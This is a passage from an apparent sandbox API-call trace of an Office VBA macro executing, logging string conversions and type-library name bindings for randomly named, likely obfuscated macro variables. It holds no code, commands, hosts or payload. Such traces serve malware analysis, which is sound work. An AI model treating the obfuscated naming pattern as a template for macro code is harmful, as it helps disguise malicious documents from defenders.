ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x242) returned 0x0 [0023.175] CRetailMalloc_Alloc () returned 0x786b818 [0023.175] IUnknown:Release (This=0x2876548) returned 0x5 [0023.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2fe6, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_LdSYNHb") returned 15 [0023.175] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_LdSYNHb", lHashVal=0x107b40, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.175] CRetailMalloc_Free () returned 0xef90001 [0023.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57983fc, cbMultiByte=7, lpWideCharStr=0x455103e, cchWideChar=16 | out: lpWideCharStr="VMsxhNG") returned 7 [0023.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798408, cbMultiByte=9, lpWideCharStr=0x455108a, cchWideChar=20 | out: lpWideCharStr="XfvYKynMy") returned 9 [0023.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798418, cbMultiByte=7, lpWideCharStr=0x4551112, cchWideChar=16 | out: lpWideCharStr="enUEHYA") returned 7 [0023.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798426, cbMultiByte=11, lpWideCharStr=0x455122a, cchWideChar=24 | out: lpWideCharStr="mGVRSfbZykn") returned 11 [0023.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798438, cbMultiByte=11, lpWideCharStr=0x455134a, cchWideChar=24 | out: lpWideCharStr="frAgyuCFKaB") returned 11 [0023.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579844a, cbMultiByte=7, lpWideCharStr=0x455146a, cchWideChar=16 | out: lpWideCharStr="kkbETbt") returned 7 [0023.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798458, cbMultiByte=11, lpWideCharStr=0x4551582, cchWideChar=24 | out: lpWideCharStr="hSCDBhRVrda") returned 11 [0023.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579846a, cbMultiByte=7, lpWideCharStr=0x45516a2, cchWideChar=16 | out: lpWideCharStr="TNARYcY") returned 7 [0023.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f283e, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="VadCGdgd") returned 9 [0023.176] ITypeComp:RemoteBind (in: This=0x2876550, szName="VadCGdgd", lHashVal=0x108e73, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x23c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x23c) returned 0x0 [0023.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f283e, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="VadCGdgd") returned 9 [0023.176] ITypeComp:RemoteBind (in: This=0x2875638, szName="VadCGdgd", lHashVal=0x108e73, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x23c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x23c) returned 0x0 [0023.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f283e, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="VadCGdgd") returned 9 [0023.176] ITypeComp:RemoteBind (in: This=0x2876778, szName="VadCGdgd", lHashVal=0x108e73, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x23c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x23c) returned 0x0 [0023.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f283e, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="VadCGdgd") returned 9 [0023.176] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="VadCGdgd", lHashVal=0x108e73, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x23c | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x23c) returned 0x0 [0023.176] CRetailMalloc_Alloc () returned 0x786b818 [0023.177] IUnknown:Release (This=0x2876548) returned 0x5 [0023.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e001a, cbMultiByte=16, lpWideCharStr=0x125374, cchWideChar=17 | out: lpWideCharStr="_B_var_VadCGdgd") returned 16 [0023.177] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_VadCGdgd", lHashVal=0x1065fc, wFlags=0x5, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.177] CRetailMalloc_Free () returned 0xef90001 [0023.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798484, cbMultiByte=11, lpWideCharStr=0x4552d66, cchWideChar=24 | out: lpWideCharStr="NVGHZCgRGFN") returned 11 [0023.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798494, cbMultiByte=10, lpWideCharStr=0x4552dba, cchWideChar=22 | out: lpWideCharStr="ybzcFWSPbY") returned 10 [0023.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57984a4, cbMultiByte=8, lpWideCharStr=0x4552e44, cchWideChar=18 | out: lpWideCharStr="LfMkfxGd") returned 8 [0023.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57984b2, cbMultiByte=8, lpWideCharStr=0x4552fde, cchWideChar=18 | out: lpWideCharStr="LCCWUdDB") returned 8 [0023.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57984c0, cbMultiByte=10, lpWideCharStr=0x45530f8, cchWideChar=22 | out: lpWideCharStr="ndLygsgbak") returned 10 [0023.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57984d0, cbMultiByte=10, lpWideCharStr=0x4553216, cchWideChar=22 | out: lpWideCharStr="fmCtWctKhY") returned 10 [0023.177] CRetailMalloc_Alloc () returned 0x56cd360 [0023.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57984e0, cbMultiByte=8, lpWideCharStr=0x4553334, cchWideChar=18 | out: lpWideCharStr="agmLMdYt") returned 8 [0023.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2902, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="tFdnZyN") returned 8 [0023.178] ITypeComp:RemoteBind (in: This=0x2876550, szName="tFdnZyN", lHashVal=0x10e16a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x246 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x246) returned 0x0 [0023.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2902, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="tFdnZyN") returned 8 [0023.178] ITypeComp:RemoteBind (in: This=0x2875638, szName="tFdnZyN", lHashVal=0x10e16a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x246 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x246) returned 0x0 [0023.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2902, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="tFdnZyN") returned 8 [0023.178] ITypeComp:RemoteBind (in: This=0x2876778, szName="tFdnZyN", lHashVal=0x10e16a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x246 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x246) returned 0x0 [0023.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2902, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="tFdnZyN") returned 8 [0023.178] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="tFdnZyN", lHashVal=0x10e16a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x246 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x246) returned 0x0 [0023.178] CRetailMalloc_Alloc () returned 0x786b818 [0023.178] IUnknown:Release (This=0x2876548) returned 0x5 [0023.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0046, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_tFdnZyN") returned 15 [0023.178] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_tFdnZyN", lHashVal=0x10e4ee, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.179] CRetailMalloc_Free () returned 0xef90001 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57984f4, cbMultiByte=11, lpWideCharStr=0x45535e2, cchWideChar=24 | out: lpWideCharStr="UcrVbdeVFTW") returned 11 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798504, cbMultiByte=7, lpWideCharStr=0x4553636, cchWideChar=16 | out: lpWideCharStr="FmrseLA") returned 7 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798512, cbMultiByte=11, lpWideCharStr=0x45536ba, cchWideChar=24 | out: lpWideCharStr="fSRkkBuerGf") returned 11 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798524, cbMultiByte=10, lpWideCharStr=0x45537da, cchWideChar=22 | out: lpWideCharStr="vcsYTtLsas") returned 10 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798534, cbMultiByte=9, lpWideCharStr=0x45538f8, cchWideChar=20 | out: lpWideCharStr="HRPKERehx") returned 9 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798544, cbMultiByte=9, lpWideCharStr=0x4553a14, cchWideChar=20 | out: lpWideCharStr="KvhFNymkY") returned 9 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798554, cbMultiByte=9, lpWideCharStr=0x4553b30, cchWideChar=20 | out: lpWideCharStr="FBMgLpHZW") returned 9 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2926, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="RaDVhAM") returned 8 [0023.179] ITypeComp:RemoteBind (in: This=0x2876550, szName="RaDVhAM", lHashVal=0x10ca42, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x248 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x248) returned 0x0 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2926, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="RaDVhAM") returned 8 [0023.179] ITypeComp:RemoteBind (in: This=0x2875638, szName="RaDVhAM", lHashVal=0x10ca42, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x248 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x248) returned 0x0 [0023.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2926, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="RaDVhAM") returned 8 [0023.179] ITypeComp:RemoteBind (in: This=0x2876778, szName="RaDVhAM", lHashVal=0x10ca42, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x248 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x248) returned 0x0 [0023.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2926, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="RaDVhAM") returned 8 [0023.180] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="RaDVhAM", lHashVal=0x10ca42, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x248 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x248) returned 0x0 [0023.180] CRetailMalloc_Alloc () returned 0x786b818 [0023.180] IUnknown:Release (This=0x2876548) returned 0x5 [0023.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e0072, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_RaDVhAM") returned 15 [0023.180] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_RaDVhAM", lHashVal=0x10be45, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.180] CRetailMalloc_Free () returned 0xef90001 [0023.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579856c, cbMultiByte=7, lpWideCharStr=0x4553dbc, cchWideChar=16 | out: lpWideCharStr="RUMeCZP") returned 7 [0023.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798578, cbMultiByte=7, lpWideCharStr=0x4553e08, cchWideChar=16 | out: lpWideCharStr="rFevcgb") returned 7 [0023.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798586, cbMultiByte=9, lpWideCharStr=0x4553e8c, cchWideChar=20 | out: lpWideCharStr="dBnyFhUPn") returned 9 [0023.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798596, cbMultiByte=11, lpWideCharStr=0x4553fa8, cchWideChar=24 | out: lpWideCharStr="LgSraHWMnsK") returned 11 [0023.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57985a8, cbMultiByte=7, lpWideCharStr=0x46f00e4, cchWideChar=16 | out: lpWideCharStr="WSyECXp") returned 7 [0023.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57985b6, cbMultiByte=11, lpWideCharStr=0x46f01fc, cchWideChar=24 | out: lpWideCharStr="MHNgRySGNMU") returned 11 [0023.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57985c8, cbMultiByte=7, lpWideCharStr=0x46f031c, cchWideChar=16 | out: lpWideCharStr="MSRDtwS") returned 7 [0023.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f294a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="cZPVGvR") returned 8 [0023.181] ITypeComp:RemoteBind (in: This=0x2876550, szName="cZPVGvR", lHashVal=0x102168, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x24a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x24a) returned 0x0 [0023.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f294a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="cZPVGvR") returned 8 [0023.181] ITypeComp:RemoteBind (in: This=0x2875638, szName="cZPVGvR", lHashVal=0x102168, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x24a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x24a) returned 0x0 [0023.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f294a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="cZPVGvR") returned 8 [0023.181] ITypeComp:RemoteBind (in: This=0x2876778, szName="cZPVGvR", lHashVal=0x102168, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x24a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x24a) returned 0x0 [0023.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f294a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="cZPVGvR") returned 8 [0023.181] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="cZPVGvR", lHashVal=0x102168, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x24a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x24a) returned 0x0 [0023.181] CRetailMalloc_Alloc () returned 0x786b818 [0023.182] IUnknown:Release (This=0x2876548) returned 0x5 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e009e, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_cZPVGvR") returned 15 [0023.182] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_cZPVGvR", lHashVal=0x1024ec, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.182] CRetailMalloc_Free () returned 0xef90001 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57985de, cbMultiByte=10, lpWideCharStr=0x46f05a4, cchWideChar=22 | out: lpWideCharStr="athdtPpxTk") returned 10 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57985ec, cbMultiByte=9, lpWideCharStr=0x46f05f6, cchWideChar=20 | out: lpWideCharStr="tdHAPRvkD") returned 9 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57985fc, cbMultiByte=10, lpWideCharStr=0x46f067e, cchWideChar=22 | out: lpWideCharStr="WhetKTvXVY") returned 10 [0023.182] CRetailMalloc_Alloc () returned 0x56cd588 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579860c, cbMultiByte=7, lpWideCharStr=0x46f079c, cchWideChar=16 | out: lpWideCharStr="RPFsPdv") returned 7 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579861a, cbMultiByte=9, lpWideCharStr=0x46f08b4, cchWideChar=20 | out: lpWideCharStr="PFbHtBGhH") returned 9 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579862a, cbMultiByte=11, lpWideCharStr=0x46f09d0, cchWideChar=24 | out: lpWideCharStr="NMBANNwaDds") returned 11 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579863c, cbMultiByte=8, lpWideCharStr=0x46f0af0, cchWideChar=18 | out: lpWideCharStr="aWYNtrrU") returned 8 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579864a, cbMultiByte=9, lpWideCharStr=0x46f0c0a, cchWideChar=20 | out: lpWideCharStr="BBXNYcWSP") returned 9 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f28da, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="ebbRTBFM") returned 9 [0023.182] ITypeComp:RemoteBind (in: This=0x2876550, szName="ebbRTBFM", lHashVal=0x103872, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x244 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x244) returned 0x0 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f28da, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="ebbRTBFM") returned 9 [0023.182] ITypeComp:RemoteBind (in: This=0x2875638, szName="ebbRTBFM", lHashVal=0x103872, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x244 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x244) returned 0x0 [0023.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f28da, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="ebbRTBFM") returned 9 [0023.183] ITypeComp:RemoteBind (in: This=0x2876778, szName="ebbRTBFM", lHashVal=0x103872, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x244 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x244) returned 0x0 [0023.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f28da, cbMultiByte=9, lpWideCharStr=0x125364, cchWideChar=10 | out: lpWideCharStr="ebbRTBFM") returned 9 [0023.183] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="ebbRTBFM", lHashVal=0x103872, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x244 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x244) returned 0x0 [0023.183] CRetailMalloc_Alloc () returned 0x786b818 [0023.183] IUnknown:Release (This=0x2876548) returned 0x5 [0023.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e00ca, cbMultiByte=16, lpWideCharStr=0x125374, cchWideChar=17 | out: lpWideCharStr="_B_var_ebbRTBFM") returned 16 [0023.183] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_ebbRTBFM", lHashVal=0x100ffb, wFlags=0x5, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.183] CRetailMalloc_Free () returned 0xef90001 [0023.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798664, cbMultiByte=0, lpWideCharStr=0x46f22d2, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0023.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2992, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="rZCrTyu") returned 8 [0023.184] ITypeComp:RemoteBind (in: This=0x2876550, szName="rZCrTyu", lHashVal=0x108c5d, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x24e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x24e) returned 0x0 [0023.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2992, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="rZCrTyu") returned 8 [0023.184] ITypeComp:RemoteBind (in: This=0x2875638, szName="rZCrTyu", lHashVal=0x108c5d, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x24e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x24e) returned 0x0 [0023.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2992, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="rZCrTyu") returned 8 [0023.184] ITypeComp:RemoteBind (in: This=0x2876778, szName="rZCrTyu", lHashVal=0x108c5d, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x24e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x24e) 